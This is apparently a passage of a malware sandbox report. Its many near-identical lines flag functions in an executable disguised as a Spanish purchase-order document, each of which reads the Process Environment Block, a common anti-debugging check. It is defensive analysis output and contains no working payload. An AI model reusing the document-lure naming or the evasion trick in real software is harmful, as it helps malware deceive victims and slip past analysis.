Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170A118 mov eax, dword ptr fs:[00000030h]	6_2_0170A118
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170A118 mov eax, dword ptr fs:[00000030h]	6_2_0170A118
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170A118 mov eax, dword ptr fs:[00000030h]	6_2_0170A118
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov eax, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov ecx, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov eax, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov eax, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov ecx, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov eax, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov eax, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov ecx, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov eax, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E10E mov ecx, dword ptr fs:[00000030h]	6_2_0170E10E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016901F8 mov eax, dword ptr fs:[00000030h]	6_2_016901F8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017361E5 mov eax, dword ptr fs:[00000030h]	6_2_017361E5
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017261C3 mov eax, dword ptr fs:[00000030h]	6_2_017261C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017261C3 mov eax, dword ptr fs:[00000030h]	6_2_017261C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_016DE1D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_016DE1D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_016DE1D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_016DE1D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_016DE1D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A0185 mov eax, dword ptr fs:[00000030h]	6_2_016A0185
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01704180 mov eax, dword ptr fs:[00000030h]	6_2_01704180
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01704180 mov eax, dword ptr fs:[00000030h]	6_2_01704180
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E019F mov eax, dword ptr fs:[00000030h]	6_2_016E019F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E019F mov eax, dword ptr fs:[00000030h]	6_2_016E019F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E019F mov eax, dword ptr fs:[00000030h]	6_2_016E019F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E019F mov eax, dword ptr fs:[00000030h]	6_2_016E019F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165A197 mov eax, dword ptr fs:[00000030h]	6_2_0165A197
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165A197 mov eax, dword ptr fs:[00000030h]	6_2_0165A197
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165A197 mov eax, dword ptr fs:[00000030h]	6_2_0165A197
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171C188 mov eax, dword ptr fs:[00000030h]	6_2_0171C188
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171C188 mov eax, dword ptr fs:[00000030h]	6_2_0171C188
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168C073 mov eax, dword ptr fs:[00000030h]	6_2_0168C073
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01662050 mov eax, dword ptr fs:[00000030h]	6_2_01662050
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6050 mov eax, dword ptr fs:[00000030h]	6_2_016E6050
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165A020 mov eax, dword ptr fs:[00000030h]	6_2_0165A020
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165C020 mov eax, dword ptr fs:[00000030h]	6_2_0165C020
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F6030 mov eax, dword ptr fs:[00000030h]	6_2_016F6030
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E4000 mov ecx, dword ptr fs:[00000030h]	6_2_016E4000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000 mov eax, dword ptr fs:[00000030h]	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E016 mov eax, dword ptr fs:[00000030h]	6_2_0167E016
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E016 mov eax, dword ptr fs:[00000030h]	6_2_0167E016
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E016 mov eax, dword ptr fs:[00000030h]	6_2_0167E016
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E016 mov eax, dword ptr fs:[00000030h]	6_2_0167E016
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0165A0E3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E60E0 mov eax, dword ptr fs:[00000030h]	6_2_016E60E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016680E9 mov eax, dword ptr fs:[00000030h]	6_2_016680E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0165C0F0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A20F0 mov ecx, dword ptr fs:[00000030h]	6_2_016A20F0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E20DE mov eax, dword ptr fs:[00000030h]	6_2_016E20DE
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F80A8 mov eax, dword ptr fs:[00000030h]	6_2_016F80A8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017260B8 mov eax, dword ptr fs:[00000030h]	6_2_017260B8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017260B8 mov ecx, dword ptr fs:[00000030h]	6_2_017260B8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166208A mov eax, dword ptr fs:[00000030h]	6_2_0166208A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170437C mov eax, dword ptr fs:[00000030h]	6_2_0170437C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172A352 mov eax, dword ptr fs:[00000030h]	6_2_0172A352
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01708350 mov ecx, dword ptr fs:[00000030h]	6_2_01708350
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E2349 mov eax, dword ptr fs:[00000030h]	6_2_016E2349
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E035C mov eax, dword ptr fs:[00000030h]	6_2_016E035C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E035C mov eax, dword ptr fs:[00000030h]	6_2_016E035C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E035C mov eax, dword ptr fs:[00000030h]	6_2_016E035C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E035C mov ecx, dword ptr fs:[00000030h]	6_2_016E035C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E035C mov eax, dword ptr fs:[00000030h]	6_2_016E035C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E035C mov eax, dword ptr fs:[00000030h]	6_2_016E035C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A30B mov eax, dword ptr fs:[00000030h]	6_2_0169A30B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A30B mov eax, dword ptr fs:[00000030h]	6_2_0169A30B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A30B mov eax, dword ptr fs:[00000030h]	6_2_0169A30B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165C310 mov ecx, dword ptr fs:[00000030h]	6_2_0165C310
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01680310 mov ecx, dword ptr fs:[00000030h]	6_2_01680310
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016703E9 mov eax, dword ptr fs:[00000030h]	6_2_016703E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016963FF mov eax, dword ptr fs:[00000030h]	6_2_016963FF
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0167E3F0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0167E3F0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0167E3F0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017043D4 mov eax, dword ptr fs:[00000030h]	6_2_017043D4
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017043D4 mov eax, dword ptr fs:[00000030h]	6_2_017043D4
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016683C0 mov eax, dword ptr fs:[00000030h]	6_2_016683C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016683C0 mov eax, dword ptr fs:[00000030h]	6_2_016683C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016683C0 mov eax, dword ptr fs:[00000030h]	6_2_016683C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016683C0 mov eax, dword ptr fs:[00000030h]	6_2_016683C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0166A3C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0166A3C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0166A3C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0166A3C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0166A3C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0166A3C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E3DB mov eax, dword ptr fs:[00000030h]	6_2_0170E3DB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E3DB mov eax, dword ptr fs:[00000030h]	6_2_0170E3DB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E3DB mov ecx, dword ptr fs:[00000030h]	6_2_0170E3DB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170E3DB mov eax, dword ptr fs:[00000030h]	6_2_0170E3DB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E63C0 mov eax, dword ptr fs:[00000030h]	6_2_016E63C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171C3CD mov eax, dword ptr fs:[00000030h]	6_2_0171C3CD
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168438F mov eax, dword ptr fs:[00000030h]	6_2_0168438F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168438F mov eax, dword ptr fs:[00000030h]	6_2_0168438F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165E388 mov eax, dword ptr fs:[00000030h]	6_2_0165E388
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165E388 mov eax, dword ptr fs:[00000030h]	6_2_0165E388
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165E388 mov eax, dword ptr fs:[00000030h]	6_2_0165E388
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01658397 mov eax, dword ptr fs:[00000030h]	6_2_01658397
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01658397 mov eax, dword ptr fs:[00000030h]	6_2_01658397
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01658397 mov eax, dword ptr fs:[00000030h]	6_2_01658397
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274 mov eax, dword ptr fs:[00000030h]	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01664260 mov eax, dword ptr fs:[00000030h]	6_2_01664260
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01664260 mov eax, dword ptr fs:[00000030h]	6_2_01664260
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01664260 mov eax, dword ptr fs:[00000030h]	6_2_01664260
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165826B mov eax, dword ptr fs:[00000030h]	6_2_0165826B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171A250 mov eax, dword ptr fs:[00000030h]	6_2_0171A250
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171A250 mov eax, dword ptr fs:[00000030h]	6_2_0171A250
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E8243 mov eax, dword ptr fs:[00000030h]	6_2_016E8243
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E8243 mov ecx, dword ptr fs:[00000030h]	6_2_016E8243
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165A250 mov eax, dword ptr fs:[00000030h]	6_2_0165A250
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666259 mov eax, dword ptr fs:[00000030h]	6_2_01666259
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165823B mov eax, dword ptr fs:[00000030h]	6_2_0165823B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016702E1 mov eax, dword ptr fs:[00000030h]	6_2_016702E1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016702E1 mov eax, dword ptr fs:[00000030h]	6_2_016702E1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016702E1 mov eax, dword ptr fs:[00000030h]	6_2_016702E1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0166A2C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0166A2C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0166A2C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0166A2C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0166A2C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016702A0 mov eax, dword ptr fs:[00000030h]	6_2_016702A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016702A0 mov eax, dword ptr fs:[00000030h]	6_2_016702A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F62A0 mov eax, dword ptr fs:[00000030h]	6_2_016F62A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F62A0 mov ecx, dword ptr fs:[00000030h]	6_2_016F62A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F62A0 mov eax, dword ptr fs:[00000030h]	6_2_016F62A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F62A0 mov eax, dword ptr fs:[00000030h]	6_2_016F62A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F62A0 mov eax, dword ptr fs:[00000030h]	6_2_016F62A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F62A0 mov eax, dword ptr fs:[00000030h]	6_2_016F62A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E0283 mov eax, dword ptr fs:[00000030h]	6_2_016E0283
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E0283 mov eax, dword ptr fs:[00000030h]	6_2_016E0283
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E0283 mov eax, dword ptr fs:[00000030h]	6_2_016E0283
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E284 mov eax, dword ptr fs:[00000030h]	6_2_0169E284
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E284 mov eax, dword ptr fs:[00000030h]	6_2_0169E284
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169656A mov eax, dword ptr fs:[00000030h]	6_2_0169656A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169656A mov eax, dword ptr fs:[00000030h]	6_2_0169656A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169656A mov eax, dword ptr fs:[00000030h]	6_2_0169656A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668550 mov eax, dword ptr fs:[00000030h]	6_2_01668550
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668550 mov eax, dword ptr fs:[00000030h]	6_2_01668550
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670535 mov eax, dword ptr fs:[00000030h]	6_2_01670535
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670535 mov eax, dword ptr fs:[00000030h]	6_2_01670535
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670535 mov eax, dword ptr fs:[00000030h]	6_2_01670535
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670535 mov eax, dword ptr fs:[00000030h]	6_2_01670535
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670535 mov eax, dword ptr fs:[00000030h]	6_2_01670535
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670535 mov eax, dword ptr fs:[00000030h]	6_2_01670535
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E53E mov eax, dword ptr fs:[00000030h]	6_2_0168E53E
